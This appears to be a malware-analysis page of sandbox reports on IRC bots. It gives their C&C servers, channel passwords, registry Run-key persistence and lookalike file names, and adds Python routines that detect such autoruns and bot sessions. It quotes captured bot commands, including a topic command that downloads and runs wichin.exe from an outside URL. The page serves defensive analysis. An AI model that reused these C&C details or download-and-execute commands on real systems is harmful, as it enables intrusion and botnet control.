asp.thand.su

DNS Lookup
    Host Name        IP Address
    0                127.0.0.1
    193.104.27.98    193.104.27.98

UDP Connections
    Remote IP Address: 127.0.0.1, Port: 1046
    Send Datagram: 78 packet(s) of size 1
    Recv Datagram: 78 packet(s) of size 1

Download URLs
    http://193.104.27.98/2krn.bin (193.104.27.98)

Outgoing connection to remote server: 193.104.27.98, TCP port 80

DNS Lookup
    Host Name        IP Address
    dell-d3e62f7e26  10.1.11.2
    10.1.11.1        10.1.11.1

igotyour.info

Remote Host       Port Number
174.129.200.54    80
91.211.119.179    2882

* The data identified by the following URL was then requested from the remote web server:
    o http://api.hostip.info/get_html.php

IRC session (the country field in the nick, "US", matches the preceding api.hostip.info geolocation lookup):
    PING :igotyour.info
    USER MartyBot 1 * :MartyBot
    NICK {WinXP|US|COMPUTERNAME|7322}
    MODE {WinXP|US|COMPUTERNAME|7322}-ix
    JOIN #pirates#
    PONG #pirates#

Registry Modifications
* The newly created Registry Value is:
    o [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
        + Windows Generic

217.148.32.202

Remote Host       Port Number
217.148.32.202    27034

IRC session (server password and channel key are both "sextsex"):
    MODE #!!hh!!# +ix
    NICK [00|USA|814587]
    USER XP-7283 * 0 :COMPUTERNAME
    MODE [00|USA|814587] +ix
    JOIN #!!hh!!# sextsex
    PASS sextsex

* The following port was open in the system:
    Port    Protocol    Process
    1054    TCP         wwwwwww.exe.exe (%Windir%\wwwwwww.exe.exe)

Registry Modifications
* The newly created Registry Value is:
    o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
        + Java Update =

bot.sohbetodasi.info

bot.sohbetodasi.info 95.168.167.63

* C&C Server: 95.168.167.63:3454
* Server Password:
* Username: XP-9973
* Nickname: [DEU|00|P|60586]
* Channel: ##msn## (Password: kuzen)
* Channeltopic:

Registry Changes by all processes
  Create or Open
  Changes
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "test" = meskoo.exe
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "test" = meskoo.exe
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "c:\yeni.exe" = c:\yeni.exe:*:Enabled:test
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg "LogSessionName" = [REG_EXPAND_SZ, value: stdout]
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg "Active"

The Run value (and its copy under the Terminal Server\Install mirror key) is the persistence; the AuthorizedApplications\List entry adds c:\yeni.exe to the Windows Firewall exception list so its inbound traffic is not blocked. Note that the Run value is a bare filename, meskoo.exe, with no path.

fr.ukbues.su

DNS Lookup
    Host Name        IP Address
    0                127.0.0.1
    193.104.27.98    193.104.27.98

UDP Connections
    Remote IP Address: 127.0.0.1, Port: 1043
    Send Datagram: 2 packet(s) of size 1
    Recv Datagram: 2 packet(s) of size 1

Download URLs
    http://193.104.27.98/2krn.bin (193.104.27.98)

Outgoing connection to remote server: 193.104.27.98, TCP port 80

DNS Lookup
    Host Name        IP Address
    dell-d3e62f7e26  10.1.11.2
    10.1.11.1        10.1.11.1
    wpad             193.104.27.98

Same downloader as asp.thand.su above: the same 2krn.bin is fetched from 193.104.27.98 over TCP port 80.

xx.enterhere.biz / xx.nadnadzz.info / xx.ka3ek.com (large botnet)

xx.enterhere.biz
xx.nadnadzz.info
xx.ka3ek.com
(for the port, have a look on the blog)

Registry Changes by all processes
  Create or Open
  Changes
    HKEY_CURRENT_USER\Software\bcrypt "i" = [REG_DWORD, value: 000007D9]
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Logon Application" = C:\WINDOWS\system32\winIogon.exe
  Reads
    HKEY_CURRENT_USER\Software\bcrypt "i"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography "MachineGuid"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
    HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
    HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"

Note the file name: winIogon.exe with a capital I in place of the lowercase l of winlogon.exe, placed in system32 next to the real binary and registered under a value name ("Windows Logon Application") chosen to look like a Windows component. The MachineGuid read is the usual source for a per-host bot identifier.

88.255.120.175

Remote Host       Port Number
88.255.120.175    7075

IRC session (server password and channel key are both "heur"):
    MODE [USA|XP|324449] -ix
    JOIN #heur heur
    NICK [USA|XP|324449]
    USER rcccgtw * 0 :COMPUTERNAME
    PASS heur

* The following port was open in the system:
    Port    Protocol    Process
    1053    TCP         csrs.exe (%Windir%\csrs.exe)

Registry Modifications
* The newly created Registry Values are:
    o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
        + Windows Services = "csrs.exe"
so that

The process name csrs.exe is one character short of csrss.exe, and it lives in %Windir% rather than %Windir%\system32.

217.23.8.169

Remote Host       Port Number
217.23.8.169      6667

IRC session:
    USER {New}{UserName|v3}866 {New}{UserName|v3}866 * :{New}{UserName|v3}866
    NICK {New}{UserName|v3}866
    PRIVMSG #b0tz : 5 >

* The following port was open in the system:
    Port    Protocol    Process
    1054    TCP         [file and pathname of the sample #1]

Registry Modifications
* The newly created Registry Values are:
    o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
        + Windows Services = "%UserProfile%\svchost.exe"

The real svchost.exe lives in %SystemRoot%\system32; a copy under %UserProfile% is the bot itself.
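The Run-key entries in these reports share a few tells: a system-binary name outside system32 (%UserProfile%\svchost.exe), a homoglyph (winIogon.exe), a one-character near-miss (csrs.exe), a double extension (wwwwwww.exe.exe), a bare filename (meskoo.exe), and a self-added Windows Firewall exception (c:\yeni.exe). The following Python is an added triage routine, not part of any of the sandbox reports above, that applies those checks to autorun entries. The entry list is constructed from the reports on this page plus one benign control; the function names (analyze_autorun, triage, canonical) and the SYSTEM_BINARIES list are my own choices.

```python
from typing import Dict, List, Tuple

# Names of binaries that legitimately live only in %SystemRoot%\system32 and
# that the samples above impersonate (assumed list; extend as needed).
SYSTEM_BINARIES = {"winlogon", "csrss", "svchost", "lsass", "services", "smss", "spoolsv"}
SYSTEM_DIRS = ("%systemroot%\\system32", "%windir%\\system32", "c:\\windows\\system32")

# Fold case and the lookalike characters used in winIogon.exe-style names.
_HOMOGLYPHS = str.maketrans({"1": "l", "i": "l", "|": "l", "0": "o"})


def canonical(stem: str) -> str:
    return stem.lower().translate(_HOMOGLYPHS)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance; catches csrs.exe vs csrss.exe."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def split_image_path(value: str) -> Tuple[str, str]:
    """(directory, filename) of the executable an autorun value points at.
    Also understands the firewall list format path:*:Enabled:name."""
    image = value.strip().strip('"')
    if ":*:" in image:
        image = image.split(":*:", 1)[0]
    directory, _, filename = image.replace("/", "\\").rpartition("\\")
    return directory, filename


def analyze_autorun(key: str, name: str, value: str) -> List[str]:
    """Reasons one registry autorun entry looks like malware persistence."""
    findings: List[str] = []
    k = key.lower()
    directory, filename = split_image_path(value)
    parts = filename.lower().split(".")
    stem = parts[0]

    if "\\authorizedapplications\\list" in k:
        findings.append("firewall exception added for " + filename)
        return findings
    if "\\terminal server\\install\\" in k:
        findings.append("Run value written under the Terminal Server\\Install mirror")
    if not directory:
        findings.append("bare filename, resolved via the search path")
    if len(parts) > 2 and parts[-1] == parts[-2]:
        findings.append("double extension ." + ".".join(parts[-2:]))

    in_system_dir = directory.lower().startswith(SYSTEM_DIRS)
    for sb in sorted(SYSTEM_BINARIES):
        if stem == sb:
            if not in_system_dir:
                findings.append(f"system binary name {sb}.exe outside system32")
        elif canonical(stem) == canonical(sb):
            findings.append(f"homoglyph lookalike of {sb}.exe")
        elif edit_distance(canonical(stem), canonical(sb)) == 1:
            findings.append(f"near-miss of {sb}.exe")
    return findings


def triage(entries: List[Tuple[str, str, str]]) -> Dict[str, List[str]]:
    """Map each flagged value to its findings; clean entries are omitted."""
    result: Dict[str, List[str]] = {}
    for key, name, value in entries:
        findings = analyze_autorun(key, name, value)
        if findings:
            result[value] = findings
    return result


RUN = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
FW = (r"HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters"
      r"\FirewallPolicy\StandardProfile\AuthorizedApplications\List")

# Constructed from the reports on this page; the last entry is a benign control.
SAMPLE_AUTORUNS = [
    (RUN, "Windows Logon Application", r"C:\WINDOWS\system32\winIogon.exe"),
    (RUN, "Windows Services", r"%UserProfile%\svchost.exe"),
    (RUN, "Windows Services", r"%Windir%\csrs.exe"),
    (RUN, "Java Update", r"%Windir%\wwwwwww.exe.exe"),
    (RUN, "test", "meskoo.exe"),
    (FW, r"c:\yeni.exe", r"c:\yeni.exe:*:Enabled:test"),
    (RUN, "SecurityHealth", r"C:\WINDOWS\system32\SecurityHealthSystray.exe"),
]

if __name__ == "__main__":
    for value, findings in triage(SAMPLE_AUTORUNS).items():
        print(value, "->", "; ".join(findings))
```

The homoglyph fold is deliberately coarse (i, l, 1 and | collapse to one letter, 0 to o) because it is applied to both sides of the comparison, so the real winlogon.exe and winIogon.exe land on the same string while unrelated names do not. Run it against the output of `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` on a live host, or against a sandbox report like the ones above.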

216.66.78.116

Remote Host       Port Number
206.188.193.39    80
216.66.78.116     6567

IRC session:
    MODE [SH|USA|00|P|33762] -ix
    JOIN #salvando# c1rc0s0leil
    PRIVMSG #salvando# :[Dl]: File download: 117.7KB to: c:\windows\wichin.exe @ 117.7KB/sec.
    PRIVMSG #salvando# :[Dl]: Created process: "c:\windows\wichin.exe", PID:
    PONG Google.Rules.Com
    NICK [SH|USA|00|P|33762]
    USER XP-9702 * 0 :COMPUTERNAME
    Now talking in #salvando#
    Topic On: [ #salvando# ] [ .desfi http://www.johngarzon.com.co/menu/xd/wichin.exe c:\windows\wichin.exe 1 ]

The channel topic is the command: on joining, the bot reads .desfi with the URL and a destination path, downloads the file to c:\windows\wichin.exe and launches it, and the two [Dl] messages are its confirmation back to the channel. The port 80 connection to 206.188.193.39 is that download.
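Every IRC entry on this page (igotyour.info, 217.148.32.202, 88.255.120.175, 217.23.8.169 and 216.66.78.116) shows the same registration shape: a templated NICK, a USER line built from the sandbox hostname, an optional PASS, a MODE +ix/-ix, a JOIN with a channel key, and commands carried in the topic or PRIVMSG. The following Python is an added example, not code from any of the reports or from the bots themselves, that reduces such a capture to its C&C indicators and scores it. The sample lines are constructed from the 217.148.32.202 and 216.66.78.116 captures above (the topic is rendered as an RPL_TOPIC 332 line, which is an assumption about how the sandbox saw it); the names parse_irc_session, score_session and is_bot_nick are mine.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Templated bot nicks as seen above ([00|USA|814587], {WinXP|US|COMPUTERNAME|7322},
# {New}{UserName|v3}866): an opening bracket followed by pipe-separated fields.
BOT_NICK_RE = re.compile(r"^[\[{]\S*\|\S*$")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
WIN_PATH_RE = re.compile(r"[A-Za-z]:\\[^\s\"'<>]+")


@dataclass
class IrcSession:
    nick: Optional[str] = None
    user: Optional[str] = None
    server_password: Optional[str] = None
    channels: Dict[str, Optional[str]] = field(default_factory=dict)  # channel -> key
    modes: List[str] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)    # download sources seen in commands
    paths: List[str] = field(default_factory=list)   # drop/exec paths seen in commands


def is_bot_nick(nick: str) -> bool:
    return BOT_NICK_RE.match(nick) is not None


def parse_irc_session(lines: List[str]) -> IrcSession:
    """Reduce one captured client/server exchange to its C&C indicators."""
    s = IrcSession()
    for raw in lines:
        line = raw.strip()
        if line.startswith(":"):              # server-originated line: drop ":prefix "
            _, _, line = line.partition(" ")
        cmd, _, rest = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "NICK":
            s.nick = rest.strip().lstrip(":")
        elif cmd == "USER":
            s.user = rest.split(" ", 1)[0]
        elif cmd == "PASS":
            s.server_password = rest.strip().lstrip(":")
        elif cmd == "JOIN":                   # JOIN #a,#b key1,key2 (keys match by position)
            parts = rest.split()
            if parts:
                keys = parts[1].split(",") if len(parts) > 1 else []
                for i, chan in enumerate(parts[0].split(",")):
                    s.channels[chan] = keys[i] if i < len(keys) else None
        elif cmd == "MODE":
            s.modes.append(rest.strip())
        elif cmd in ("PRIVMSG", "TOPIC", "332"):
            # Commands ride in the topic (332 = RPL_TOPIC); bot status comes back as PRIVMSG.
            _, _, trailing = rest.partition(":")
            s.urls.extend(URL_RE.findall(trailing))
            s.paths.extend(WIN_PATH_RE.findall(trailing))
    return s


def score_session(s: IrcSession) -> List[str]:
    """Reasons the exchange looks like a bot registration rather than a chat client."""
    reasons: List[str] = []
    if s.nick and is_bot_nick(s.nick):
        reasons.append("templated nick")
    if any(m.endswith(("+ix", "-ix")) for m in s.modes):
        reasons.append("user mode ix")      # i = invisible, x = cloaked host on Unreal-style servers
    if any(s.channels.values()):
        reasons.append("keyed channel")
    if s.urls and s.paths:
        reasons.append("download-and-execute command")
    return reasons


# Constructed samples modelled on the 217.148.32.202 and 216.66.78.116 captures.
SAMPLE_HH = [
    "PASS sextsex",
    "NICK [00|USA|814587]",
    "USER XP-7283 * 0 :COMPUTERNAME",
    "MODE [00|USA|814587] +ix",
    "JOIN #!!hh!!# sextsex",
]
SAMPLE_SALVANDO = [
    "NICK [SH|USA|00|P|33762]",
    "USER XP-9702 * 0 :COMPUTERNAME",
    "MODE [SH|USA|00|P|33762] -ix",
    "JOIN #salvando# c1rc0s0leil",
    ":Google.Rules.Com 332 [SH|USA|00|P|33762] #salvando# :.desfi "
    "http://www.johngarzon.com.co/menu/xd/wichin.exe c:\\windows\\wichin.exe 1",
    "PRIVMSG #salvando# :[Dl]: File download: 117.7KB to: c:\\windows\\wichin.exe @ 117.7KB/sec.",
]

if __name__ == "__main__":
    for sample in (SAMPLE_HH, SAMPLE_SALVANDO):
        session = parse_irc_session(sample)
        print(session.nick, session.channels, session.urls, score_session(session))
```

The parser does not care about line order (217.148.32.202 sends PASS last), which matters because these bots do not follow RFC 1459 registration order. Feed it the client side of a pcap follow-stream, or the sandbox's own network log, and the channel keys, server passwords and download URLs are exactly what goes into the blocklist and the IRC-based detection signature.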